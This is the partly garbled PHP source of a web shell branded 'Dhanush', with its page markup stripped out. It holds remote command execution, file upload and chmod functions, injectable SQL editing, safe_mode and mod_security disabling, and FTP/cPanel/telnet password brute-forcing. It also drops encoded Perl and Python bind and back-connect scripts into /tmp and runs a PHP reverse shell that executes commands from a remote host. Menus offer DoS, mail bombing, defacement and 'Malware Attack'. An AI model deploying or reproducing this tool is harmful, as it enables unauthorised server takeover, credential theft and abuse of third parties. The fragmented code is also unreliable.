[ $dbname ] - > Database List > Table List [ Log Out ]

"; ?>

primary_key == 1 ) if( $field->numeric == 1 ) $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; else $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; } $key = substr( $key, 0, strlen($key)-4 ); mysql_select_db( $dbname, $mysqlHandle ); $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle ); $data = mysql_fetch_array( $pResult ); echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); $num = mysql_num_rows( $pResult ); $pResultLen = mysql_list_fields( $dbname, $tablename ); $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',"; $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',"; for( $i = 0; $i < $num; $i++ ) { $field = mysql_fetch_array( $pResult ); $fieldname = $field["Field"]; $fieldtype = $field["Type"]; $len = mysql_field_len( $pResultLen, $i ); echo ""; echo ""; echo ""; echo "\n"; $value = htmlspecialchars($data[$i]); $type = strtok( $fieldtype, " (,)\n" ); if( $type == "enum" || $type == "set" ) { echo "\n"; } else { if( $len < 40 ) echo "\n"; else echo ""; } $fundata1=eregi_replace(',$', '', $fundata1); $fundata2=eregi_replace(',$', '', $fundata2); echo "

Name	Type	Function	Data
$fieldname	".$field["Type"]."	\n"; echo "\n"; echo "	\n"; if( $type == "enum" ) echo "\n"; while( $str = strtok( "'" ) ) { if( $value == $str ) echo "		$value\n"; } $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,"; echo "

\n"; echo "\n"; echo "\n"; echo "

\n"; } } // Edit Submit Table Data else if($_REQUEST['action'] == "editsubmitData") { $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_POST['dbname']; $tablename = $_POST['tablename']; $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');"); $row = mysql_fetch_array($sql); $row = $row['COLUMN_NAME']; $rowid = $_POST[$row]; $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); $num = mysql_num_rows( $pResult ); $rowcount = $num; $pResultLen = mysql_list_fields( $dbname, $tablename ); for( $i = 0; $i < $num; $i++ ) { $field = mysql_fetch_array( $pResult ); $fieldname = $field["Field"]; $arrdata = $_REQUEST[$fieldname]; $str .= " " . $fieldname . " = '" . $arrdata . "'"; $rowcount--; if($rowcount != 0) $str .= ","; } $str = "update $tablename set" . $str . " where $row=$rowid"; mysql_query($str); ?>

File $v Deleted Successfully"; else echo "
Cannot Delete File $v"; } else if(is_dir($v)) { rrmdir($v); } } } else if($_POST['choice'] == "chmod") { ?> =0;--$i) $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1)); echo "

"; if(@chmod($v,$perms)) echo "File $v Permissions Changed Successfully
"; else echo "Cannot Change $v File Permissions
"; echo "

"; } } } } else if($_POST['choice'] == "compre") { $actbox = $_POST["actbox"]; foreach ($actbox as $myv) $myv = explode(",",$myv); foreach ($myv as $v) { if(is_file($v)) { $zip = new ZipArchive(); $filename= basename($v) . '.zip'; if(($zip->open($filename, ZipArchive::CREATE))!==true) { echo '
Error: Unable to create zip file for $v';} else {echo "
File $v Compressed successfully";} $zip->addFile(basename($v)); $zip->close(); } else if(is_dir($v)) { if($os == "Linux") { $filename= basename($v); execmd("tar --create --recursion --file=$filename.tar $v"); echo "
File $v Compressed successfully as $v.tar"; } } } } else if($_POST['choice'] == "uncompre") { $actbox = $_POST["actbox"]; foreach ($actbox as $myv) $myv = explode(",",$myv); foreach ($myv as $v) { if(is_file($v) || is_dir($v)) { $zip = new ZipArchive; $filename= basename($v); $res = $zip->open($filename); if ($res === TRUE) { $pieces = explode(".",$filename); $zip->extractTo($pieces[0]); $zip->close(); echo "
File $v Unzipped successfully"; } else echo "
Error: Unable to Unzip file $v"; } } } } else if(isset($_GET['sitename'])) { $sitename = str_replace("http://","",$_GET['sitename']); $sitename = str_replace("http://www.","",$sitename); $sitename = str_replace("www.","",$sitename); $show = myexe("ls -la /etc/valiases/".$sitename); if(!empty($show)) echo $show; else echo "Cannot get the username"; } else if(isset($_GET['mydata'])) { listdatabase(); } else if(isset($_GET['home'])) { mainfun($_GET['home']); } else if(isset($_GET['dir'])) { mainfun($_GET['myfilepath']); } else if(isset($_GET['mydirpath'])) { echo is_writable($_GET['mydirpath'])?"< writable >":"< not writable >"; } else { ?> Dhanush : By Arjun

Dhanush : By Arjun

2) { flush(); $count++; } } } ?> 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; $count++; } ?>

System Info :		Server Port :	Software Info
Uid :		Websites :		Websites :
Disk Space :	Free Space :	Server IP :	Your IP :
View Directories :	Current Directory : ".htmlspecialchars($b).$directorysperator.''; $i++; } ?> [Home]	Disable functions :	Safe Mode :	Download It

'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect'); $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about'); echo ""; $menu = ''; foreach($m1 as $k => $v) $menu .= ""; echo $menu; echo "

[".$k."]

[Back] [Forward] [Refresh]

"; foreach($m2 as $k => $v) $menu1 .= ""; echo $menu1; echo "

[".$k."]

[SelfKill]

[LogOut]

";?>

SecFilterEngine Off SecFilterScanPOST Off \n\r"); $file_pointer = fopen("ini.php", "w+"); fwrite($file_pointer, ""); $file_pointer = fopen("php.ini", "w+"); fwrite($file_pointer, "safe_mode = Off"); fclose($file_pointer); } else if(isset($_POST['cpanelattack'])) { if(!empty($_POST['username']) && !empty($_POST['password'])) { $userlist=explode("\n",$_POST['username']); $passlist=explode("\n",$_POST['password']); if($_POST['cracktype'] == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") { if($cracktype == "telnet") $cpanel_port="23"; else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); echo " [ - ] Processing user $pureuser ...

"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } } else $bdmessage = "Enter Username & Password List"; } else if(isset($_GET['info'])) { $bdmessage = "

".nl2br(shell_exec("whois ".$_GET['info']))."

"; } else if(isset($_POST['u'])) { $path = $_REQUEST['path']; if(is_dir($path)) { $setuploadvalue = 0; $uploadedFilePath = $_FILES['uploadfile']['name']; $tempName = $_FILES['uploadfile']['tmp_name']; if($os == "Windows") $uploadPath = $path . $directorysperator . $uploadedFilePath; else if($os == "Linux") $uploadPath = $path . $directorysperator . $uploadedFilePath; if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath)) $bdmessage = "File uploaded to $uploadPath"; else $bdmessage = "Failed to upload file to $uploadPath"; } ?>$out\n".execmd("ps aux | grep bp.pl").""; } else { @$fh=fopen("/tmp/bp.pl","w"); @fwrite($fh,gzinflate(base64_decode($bind_port_p))); @fclose($fh); execmd("chmod 0755 ".getcwd()."/bp.pl"); execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &"); $bdmessage = "

$out\n".execmd("ps aux | grep bp.pl")."

"; } } } } else if(isset($_POST['backconnect'])) { if($_POST['ip'] != "" && $_POST['port'] != "") { ?>Trying to connect..."; execmd("perl ".getcwd()."/bc.pl $host $port &",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,gzuncompress(base64_decode($backconnect_perl))); @fclose($fh); $bdmessage = "Trying to connect..."; execmd("perl /tmp/bc.pl $host $port &",$disable); if(!@unlink("/tmp/bc.pl")) echo "

Warning: Failed to delete reverse-connection program

"; } } else if($_POST["lang"] == "python") { if(is_writable(".")) { $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error()); if($w_file) { @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); @fclose($w_file); chmod(getcwd().'/bc.py', 0777); } execmd("python ".getcwd()."/bc.py $host $port &",$disable); $bdmessage = "Trying to connect..."; if(!@unlink(getcwd()."/bc.py")) echo "

Warning: Failed to delete reverse-connection program

"; } else { $w_file=@fopen("/tmp/bc.py","w"); if($w_file) { @fputs($w_file,gzuncompress(base64_decode($back_connect_p))); @fclose($w_file); chmod('/tmp/bc.py', 0777); } execmd("python /tmp/bc.py $host $port &",$disable); $bdmessage = "Trying to connect..."; if(!@unlink("/tmp/bc.py")) echo "

Warning: Failed to delete reverse-connection program

"; } } else if($_POST["lang"] == "php") { $bdmessage = "Trying to connect..."; $ip = $_POST['ip']; $port=$_POST['port']; $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { $bdmessage = "$errno : $errstr"; } else if (!$sockfd) { $result = "

Fatal : An unexpected error was occured when trying to connect!

"; } else { fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n================================================================="); $pwd = exec_all("pwd"); $sysinfo = exec_all("uname -a"); $id = exec_all("id"); $len = 1337; fputs($sockfd ,$sysinfo . "\n" ); fputs($sockfd ,$pwd . "\n" ); fputs($sockfd ,$id ."\n\n" ); fputs($sockfd ,$dateAndTime."\n\n" ); while(!feof($sockfd)) { $cmdPrompt ="(dhanush)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . exec_all($command) . "\n\n"); } fclose($sockfd); } } } } else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2'])) { $temp = ""; for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++) { $uid = @posix_getpwuid($_GET['val1']); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; paramexe('Users', $temp); } else if(isset($_GET['download'])) { download(); } else { ?>< writable >":"< not writable >"; ?>

Upload file :	Create File :
Execute :	Create Directory :
Get Exploit	Some Commands

धनुष
--==Coded By Arjun==--
जय हिन्द

Host :	Database :
User :	Password :
Type :	Prefix :
Site URL : Head : Kate ID : All <b>lol ! You Are Hacked !!!!</b>

Host :	DataBase :
User :	Password :
Type :	Prefix :
User ID : New Password : New Username : New Password : User ID : New Password : New Username :

To
Subject
No. of Times
Pad your message (Less spam detection)
Hello !! This is Dhanush!!

IP
Port
Timeout (Time in seconds)
Execution Time (Time in seconds)
No of Bytes per/packet

BruteForce
Type :
Server : Port :	" class="sbox">
Brute type :	/etc/passwd reverse (login -> nigol) Dictionary Login : Dictionary :

Dhanush
User Name :
Password :

--==Coded By Arjun==--

From :
To :

Port Scanner

Connect To Database
Server Address :
Username :
Password: